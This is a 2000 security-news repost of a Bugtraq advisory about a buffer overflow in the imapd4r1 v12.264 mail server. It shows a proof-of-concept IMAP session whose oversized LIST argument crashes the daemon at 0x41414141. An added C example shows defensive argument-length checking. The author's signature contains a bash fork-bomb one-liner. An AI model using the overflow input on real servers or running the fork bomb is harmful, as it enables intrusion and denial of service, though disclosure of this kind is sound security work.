Originally Published: Monday, 17 April 2000
Author: Alexander Reelsen
Published to: news_enhance_security/Security News

imapd4r1 v12.264 exploit

The IMAP daemon shipped with the newest Red Hat has a security hole that allows an intruder to get shell access to the mail account.

From: Michal Zalewski
Subject: imapd4r1 v12.264
To: BUGTRAQ@SECURITYFOCUS.COM

Newest RH:

* OK nimue IMAP4rev1 v12.264 server ready
1 login lcamtuf test
1 OK LOGIN completed
1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()


Privileges seem to be dropped, but, anyway, it's a nice way to get shell access to the mail account, maybe grab some data from memory, etc. I believe both the imap and ipopd packages need a code security audit.

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
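
The crash in the post above (execution at 0x41414141 after a LIST with a very long argument) is what an unchecked copy of a command argument into a fixed-size buffer typically produces. As an added example, not imapd's code and not part of the original post, here is a LIST argument parser in C that checks each argument's length before copying it; `parse_list`, `next_arg` and the 255-byte `ARG_MAX_LEN` limit are assumptions made for this example.

```c
#include <stddef.h>
#include <string.h>

#define ARG_MAX_LEN 255   /* assumed limit for this example, not an imapd constant */

enum { ARG_OK = 0, ARG_MALFORMED = -1, ARG_TOO_LONG = -2 };

/* Copy one IMAP argument (quoted string or atom) from *p into out[outsz].
 * The length is checked BEFORE any byte is written, so an oversized
 * argument is rejected instead of being truncated or overflowing `out`.
 * Backslash escapes inside quoted strings are not handled here. */
static int next_arg(const char **p, char *out, size_t outsz)
{
    const char *s = *p, *end;
    size_t len;

    while (*s == ' ') s++;
    if (*s == '"') {                        /* quoted string */
        s++;
        end = strchr(s, '"');
        if (end == NULL) return ARG_MALFORMED;
        len = (size_t)(end - s);
        *p = end + 1;
    } else {                                /* atom: runs to next space or line end */
        len = strcspn(s, " \r\n");
        if (len == 0) return ARG_MALFORMED;
        *p = s + len;
    }
    if (len >= outsz) return ARG_TOO_LONG;  /* must leave room for the NUL */
    memcpy(out, s, len);
    out[len] = '\0';
    return ARG_OK;
}

/* Parse `<tag> LIST <reference> <mailbox-pattern>` from one request line. */
int parse_list(const char *line, char *ref, size_t refsz, char *pat, size_t patsz)
{
    char tag[32], cmd[16];
    int rc;

    if ((rc = next_arg(&line, tag, sizeof tag)) != ARG_OK) return rc;
    if ((rc = next_arg(&line, cmd, sizeof cmd)) != ARG_OK) return rc;
    if (strcmp(cmd, "list") != 0 && strcmp(cmd, "LIST") != 0) return ARG_MALFORMED;
    if ((rc = next_arg(&line, ref, refsz)) != ARG_OK) return rc;
    return next_arg(&line, pat, patsz);
}
```

A server using this pattern would answer an `ARG_TOO_LONG` result with a tagged `BAD` response and log the event, rather than passing the argument on.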